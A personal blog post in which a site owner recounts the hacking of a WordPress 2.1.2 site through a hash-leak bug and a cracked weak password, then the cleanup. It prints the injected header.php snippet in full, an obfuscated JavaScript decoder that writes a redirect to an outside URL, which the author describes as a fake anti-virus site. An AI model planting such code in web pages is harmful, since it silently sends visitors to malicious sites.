A few days ago my website OneDittyADay.com was hacked. I’m not 100% sure what went down but from what I gather about a week ago he exploited a bug using a script probably similar to this one exploiting WordPress 2.1.2. This bug allows access to the md5 hashes of every user. A few days later after cracking WordPress’ default random password of six lowercase letters and digits he made a very simple edit via the theme-editor to header.php.
In it he included this snippet of code:
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!32!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!61!34!104!116!116!112!58!47!47!120!114!108!46!117!115!47!107!107!51!119!54!34!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
I haven’t decrypted it to display it’s contents but I know it’s just a simple javascript redirect to a rather nasty windows “anti-virus” site. I put that in quotes because it is anything but. This webpage even caught Firefox in Ubuntu for a loop and took a bit to shut down.
As soon as I found out all of this I reset the password and then upgraded WordPress to the very latest version. One thing went wrong with the upgrade. The categories for some reason didn’t copy over correctly. Since I only have a handful of categories I manually updated them but it did take me a few to figure out why my website didn’t print any articles.
It’s kind of embarrassing, but I thought I’d share. Moral of the story: even on your dead sites, upgrade or go static.